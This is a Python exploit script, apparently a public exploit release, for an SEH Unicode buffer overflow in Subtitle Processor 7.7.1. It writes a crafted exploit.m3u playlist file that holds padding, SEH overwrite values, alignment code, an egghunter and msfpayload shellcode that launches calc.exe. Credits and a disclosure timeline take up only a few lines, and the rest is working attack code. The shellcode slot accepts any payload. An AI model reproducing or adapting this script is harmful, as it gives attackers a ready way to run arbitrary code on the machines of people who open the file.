#!/usr/bin/python # I wanted to first of all thank all the people who took the time to help me. # Peter Van Eeckhoutte AKA corelanc0d3r. Awesome tutorials and thanks for putting up with me! # Jason Kratzer. Thanks a lot for helping me finish this exploit and showing me techniques! # Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow # Download: http://sourceforge.net/projects/subtitleproc/ # Version 7.7.1 # Author: Brandon Murphy # Tested on Windows XP Pro SP3 # Author notified of vulnerability by email 12/11/2010 # No reply from author: Released exploit to public 4/26/2011 print "#=========================================================#" print "# Subtitle Processor 7.7.1 SEH Unicode Buffer Overflow #" print "# Vulnerability found & exploit written by Brandon Murphy #" print "# Fallow: @MK1234Tfan #" print "#=========================================================#" junk = "\x41" * 70 tag = "s1cks1ck" # msfpayload windows/exec CMD=calc.exe 496 shellcode = ("\x89\xe5\xdd\xc2\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x43" "\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34" "\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41" "\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" "\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4d\x59\x43\x30" "\x45\x50\x45\x50\x45\x30\x4b\x39\x5a\x45\x50\x31\x58\x52\x43" "\x54\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x56\x32\x54\x4c\x4c\x4b" "\x51\x42\x52\x34\x4c\x4b\x54\x32\x56\x48\x54\x4f\x4e\x57\x51" "\x5a\x56\x46\x56\x51\x4b\x4f\x56\x51\x49\x50\x4e\x4c\x47\x4c" "\x43\x51\x43\x4c\x45\x52\x56\x4c\x51\x30\x49\x51\x58\x4f\x54" "\x4d\x43\x31\x58\x47\x4b\x52\x5a\x50\x56\x32\x50\x57\x4c\x4b" "\x56\x32\x52\x30\x4c\x4b\x51\x52\x47\x4c\x45\x51\x58\x50\x4c" "\x4b\x47\x30\x43\x48\x4c\x45\x4f\x30\x43\x44\x51\x5a\x43\x31" "\x58\x50\x50\x50\x4c\x4b\x51\x58\x45\x48\x4c\x4b\x56\x38\x47" "\x50\x45\x51\x49\x43\x4b\x53\x47\x4c\x51\x59\x4c\x4b\x50\x34" "\x4c\x4b\x45\x51\x49\x46\x56\x51\x4b\x4f\x50\x31\x49\x50\x4e" "\x4c\x4f\x31\x58\x4f\x54\x4d\x45\x51\x49\x57\x50\x38\x4b\x50" "\x54\x35\x4c\x34\x45\x53\x43\x4d\x4c\x38\x47\x4b\x43\x4d\x56" "\x44\x54\x35\x5a\x42\x51\x48\x4c\x4b\x50\x58\x51\x34\x45\x51" "\x58\x53\x45\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x51\x48\x45" "\x4c\x43\x31\x58\x53\x4c\x4b\x54\x44\x4c\x4b\x45\x51\x4e\x30" "\x4b\x39\x51\x54\x47\x54\x51\x34\x51\x4b\x51\x4b\x43\x51\x50" "\x59\x50\x5a\x50\x51\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x51\x4a" "\x4c\x4b\x54\x52\x5a\x4b\x4b\x36\x51\x4d\x52\x4a\x43\x31\x4c" "\x4d\x4d\x55\x4f\x49\x43\x30\x45\x50\x43\x30\x50\x50\x43\x58" "\x50\x31\x4c\x4b\x52\x4f\x4b\x37\x4b\x4f\x4e\x35\x4f\x4b\x5a" "\x50\x4e\x55\x4f\x52\x50\x56\x43\x58\x49\x36\x4c\x55\x4f\x4d" "\x4d\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x43\x4c\x54\x4a\x4d" "\x50\x4b\x4b\x4b\x50\x43\x45\x54\x45\x4f\x4b\x50\x47\x54\x53" "\x54\x32\x52\x4f\x43\x5a\x43\x30\x51\x43\x4b\x4f\x49\x45\x52" "\x43\x43\x51\x52\x4c\x45\x33\x56\x4e\x52\x45\x52\x58\x45\x35" "\x43\x30\x41\x41") junk2 = "\x41" * 3531 nseh = "\x61\x62" # ppr 005700b4 Subtitleprocessor.exe seh = "\xb4\x57" # Venetian # Align: # add byte ptr [esi],ch - \x6e # pop ebp - \x55 # add byte ptr [esi],ch - \x6e # pop eax - \x58 # add byte ptr [esi],ch - \x6e # add eax,0x11001400 - \x05\x14\x11 # add byte ptr [esi],ch - \x6e # sub eax,0x11001300 - \x2d\x13\x11 # add byte ptr [esi],ch - \x6e # # Jump: # push eax - \x50 # add byte ptr [esi],ch - \x6e # ret - \xc3 align = "\x6e\x55\x6e\x58\x6e\x05\x14\x11\x6e\x2d\x13\x11\x6e" jmp = "\x50\x6e\xc3" junk3 = "\x44" * 108 egghunter = ("PPYA4444444444QATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58A" "APAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABABAB30APB944JB1V3Q7ZKOLO0B0R1ZKR0X8MNNOLKU0Z2TJO6X2S011S2K4KJZ6O2U9Z6O2U9WKO9WKPA") payload = junk + tag + shellcode + junk2 + nseh + seh + align + jmp + junk3 + egghunter try: make = open("exploit.m3u",'w') make.write(payload) make.close() print "[+] Go Go Gadget SEH unicode!" except: print "[-] Something went wrong...</3"